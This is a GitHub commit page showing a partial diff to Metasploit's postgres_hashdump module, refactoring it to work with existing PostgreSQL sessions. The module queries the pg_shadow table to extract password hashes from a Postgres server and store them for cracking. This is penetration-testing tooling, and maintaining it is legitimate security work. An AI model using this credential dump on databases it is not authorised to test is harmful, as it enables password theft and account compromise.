Skip to content

Commit

Permalink
Use PostgreSQL session type for postgres_hashdump
Browse files Browse the repository at this point in the history
  • Loading branch information
sjanusz-r7 committed Jan 15, 2024
1 parent f4ddf8d commit b74e994
Showing 1 changed file with 25 additions and 10 deletions.
35 changes: 25 additions & 10 deletions modules/auxiliary/scanner/postgres/postgres_hashdump.rb
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Postgres
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::OptionalSession

def initialize
super(
Expand All @@ -16,22 +17,36 @@ def initialize
hashes from a Postgres server and stores them for later cracking.
},
'Author' => ['theLightCosine'],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'SessionTypes' => %w[PostgreSQL]
)
register_options([
OptString.new('DATABASE', [ true, 'The database to authenticate against', 'postgres']),
OptString.new('DATABASE', [ false, 'The database to authenticate against', 'postgres']),
OptString.new('USERNAME', [ false, 'The username to authenticate as', 'postgres'])
])
deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')

end

def run_host(ip)
def username
session ? session.client.params['username'] : datastore['USERNAME']
end

def realm
session ? session.client.params['database'] : datastore['DATABASE']
end

def private_data
# The session or its client doesn't store the password
session ? nil : datastore['PASSWORD']
end

def run_host(ip)
# Query the Postgres Shadow table for username and password hashes and report them
res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)

service_data = {
address: ip,
address: rhost,
port: rport,
service_name: 'postgres',
protocol: 'tcp',
Expand All @@ -41,11 +56,11 @@ def run_host(ip)
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
private_data: datastore['PASSWORD'],
private_data: private_data,
private_type: :password,
username: datastore['USERNAME'],
username: username,
realm_key: Metasploit::Model::Realm::Key::POSTGRESQL_DATABASE,
realm_value: datastore['DATABASE']
realm_value: realm
}

credential_data.merge!(service_data)
Expand All @@ -68,10 +83,10 @@ def run_host(ip)

case res[:sql_error]
when /^C42501/
print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - Insufficient permissions."
print_error "#{rhost}:#{rport} Postgres - Insufficient permissions."
return
else
print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - #{res[:sql_error]}"
print_error "#{rhost}:#{rport} Postgres - #{res[:sql_error]}"
return
end
when :complete
Expand All @@ -96,7 +111,7 @@ def run_host(ip)
)

service_data = {
address: ::Rex::Socket.getaddress(rhost,true),
address: rhost,
port: rport,
service_name: 'postgres',
protocol: 'tcp',
Expand Down

0 comments on commit b74e994

Please sign in to comment.